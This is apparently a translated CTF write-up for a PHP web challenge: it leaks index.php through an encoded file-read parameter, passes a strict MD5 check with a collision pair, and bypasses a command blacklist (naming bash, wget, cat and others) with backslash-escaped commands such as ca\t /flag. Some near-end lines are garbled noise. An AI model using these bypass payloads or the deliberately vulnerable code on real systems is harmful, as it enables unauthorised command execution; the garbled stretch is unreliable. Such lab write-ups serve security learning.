<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
<p>Opening the challenge gives a URL of the form ?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd= ; view the page source at the same time.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
<p>The page shows "MD5 is funny", which suggests that this challenge most likely revolves around MD5.</p>
<p>I then captured the request; there was nothing special in the headers, so I tried starting from the URL.</p>
<p>First, base64-decode the img value once.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
<p>After one decode the result still looks like base64, so decode it again.</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
<p>Then hex-decode the result, which gives</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">555.png
</pre>
</div>
<p>Encode index.php the same way, in reverse order (hex-encode the name, then base64-encode it twice; this is encoding, not encryption):</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
</pre>
</div>
<p>Then pass this as the img parameter in the address bar.</p>
<p>Then view the page source and decode the base64 string it contains (the file contents come back inside the data: URI of the img tag); this is the source of index.php:</p>
<div class="cnblogs_code">
<pre><?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
// gate 1: the img parameter is hex -> base64 -> base64 of a filename;
// everything outside [a-zA-Z0-9.] is stripped and "flag" is rejected
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
// gate 2: blacklist on cmd (note: no lone backslash, no dir, no sort)
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    // gate 3: strict MD5 comparison on two different strings, then shell execution
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}
?>
<html>
<style>
body{
background:url(./bj.png) no-repeat center center;
background-size:cover;
background-attachment:fixed;
background-color:#CCCCCC;
}
</style>
<body>
</body>
</html></pre>
</div>
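<p>As an added example (not from the original writeup), the following Python reproduces the img handling from the source above: the hex-then-double-base64 encoding of the filename, the lenient decoding that PHP's base64_decode() performs on unpadded input, and the two checks applied to the decoded name. It is checked against the two token values from the writeup; the function names are my own.</p>

```python
import base64
import binascii
import re


def _b64decode_lenient(s: str) -> bytes:
    """Decode like PHP's base64_decode(): silently tolerate missing '=' padding."""
    return base64.b64decode(s + "=" * (-len(s) % 4))


def encode_img(filename: str) -> str:
    """Build the img= value index.php expects: hex -> base64 -> base64.

    The challenge URL carries the value without trailing '=' padding
    (PHP does not need it), so the padding is stripped here as well.
    """
    inner = base64.b64encode(filename.encode().hex().encode())
    return base64.b64encode(inner).decode().rstrip("=")


def decode_img(token: str) -> str:
    """Inverse of encode_img, mirroring hex2bin(base64_decode(base64_decode($img)))."""
    raw = _b64decode_lenient(_b64decode_lenient(token).decode())
    return binascii.unhexlify(raw).decode()


def sanitize(path: str):
    """Mirror the two checks index.php applies to the decoded filename.

    Returns the name file_get_contents() would receive, or None when the
    script would die with "xixi~ no flag".
    """
    cleaned = re.sub(r"[^a-zA-Z0-9.]+", "", path)   # preg_replace("/[^a-zA-Z0-9.]+/", "", $file)
    if re.search(r"flag", cleaned, re.IGNORECASE):  # preg_match("/flag/i", $file)
        return None
    return cleaned


if __name__ == "__main__":
    # The two tokens seen in the writeup.
    for token in ("TXpVek5UTTFNbVUzTURabE5qYz0", "TmprMlpUWTBOalUzT0RKbE56QTJPRGN3"):
        print(token, "->", decode_img(token))
    print("index.php ->", encode_img("index.php"))
    # What the sanitizer does to a few attempts (constructed inputs).
    for name in ("index.php", "../../etc/passwd", "../flag", "/FLAG"):
        print(repr(name), "->", sanitize(name))
```

<p>Note what the sanitizer does: slashes are stripped, so a traversal name such as ../../etc/passwd collapses to ....etcpasswd, and any name containing flag (case-insensitively) is rejected outright. The file-read path therefore only ever yields files in the web root, which is why the flag has to come through cmd.</p>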
<p>Combined with the earlier deduction, the key code is:</p>
<div class="cnblogs_code">
<pre>    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }</pre>
</div>
<p>This is the strict-comparison case (a "strong collision" in CTF terms): === rules out the 0e magic-hash trick, which only works with ==, and the (string) casts defeat the array trick, because both sides become "Array" and the first condition fails. So a and b must be two genuinely different byte strings with the same MD5. A published single-block MD5 collision pair, two 64-byte messages that differ in only two bits, does the job:</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<p>With that, whatever is in cmd is executed as a shell command through the backtick operator.</p>
<p>So the payload is:</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
<p>Because a lone backslash '\' is not in the blacklist, it can be used to bypass it: the shell treats a backslash outside quotes as a quoting character and removes it before looking up the command.</p>
<p>So ls and l\s give the same result when executed.</p>
! _! S/ U$ I* @7 M6 V/ ]<p>然后发现根目录里面有/flag</p>
' J6 y: Z% @- \0 k, H<p>于是payload:</p>
W7 o- ~. Q3 \! ~# v3 G0 }( \<div class="cnblogs_Highlighter">7 W: Q0 u- S. U
<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag' v* Q2 T* k M$ ?
</pre>
( j) b! F$ p& O) O9 Z</div>
<p>For this challenge, sort and dir are not in the blacklist either,</p>
<p>so dir can replace ls for listing and sort can replace cat for reading the file.</p>
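<p>As an added example (not part of the original writeup), the Python below re-implements the cmd blacklist exactly as PHP compiles it after double-quote unescaping, and uses shlex to show what the shell sees after quote removal. The pattern is reconstructed from the source above (duplicate alternatives dropped); the function names and the payload list are my own.</p>

```python
import re
import shlex

# The blacklist from index.php as PHP actually compiles it.  In the PHP
# source the fragment \\|\\\\ becomes \|\\ after string unescaping, which
# the regex engine reads as ONE alternative: the two-character sequence "|\".
# A lone backslash is therefore never matched; that is the gap the bypass uses.
# (PHP's \xA0 matches the single byte 0xA0; here it matches U+00A0, close enough.)
CMD_BLACKLIST = re.compile(
    r"ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless"
    r"|pcre|paste|diff|file|echo|sh"
    r"|'|\"|`|;|,|\*|\?|\|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|&[^\d]|@|\||\$|\[|\]|-|<|>",
    re.IGNORECASE,
)


def is_forbidden(cmd: str) -> bool:
    """True when index.php would answer "forbid ~" instead of running cmd."""
    return CMD_BLACKLIST.search(cmd) is not None


def shell_sees(cmd: str) -> list:
    """Approximate the argv /bin/sh builds from `$cmd` after quote removal.

    shlex in POSIX mode applies the same rule as sh: a backslash outside quotes
    escapes the next character and is then dropped, so ca\\t becomes cat.
    """
    return shlex.split(cmd)


def classify(cmd: str):
    """(blocked?, argv-or-None) for one candidate cmd value."""
    if is_forbidden(cmd):
        return True, None
    return False, shell_sees(cmd)


if __name__ == "__main__":
    # Constructed candidates: the obvious ones, the writeup's bypasses, and alternatives.
    for candidate in ("ls", "cat /flag", "ls -la", "$(id)", "a|b",
                      "l\\s", "ca\\t /flag", "dir /", "sort /flag"):
        blocked, argv = classify(candidate)
        print(f"{candidate!r:16} -> {'forbid ~' if blocked else argv}")
```

<p>The two lines that matter are l\s and ca\t /flag: the filter sees a backslash between the letters and does not match ls or cat, but the shell strips that backslash before the command lookup, so it runs ls and cat unchanged. dir / and sort /flag pass for the simpler reason that neither word is on the list at all.</p>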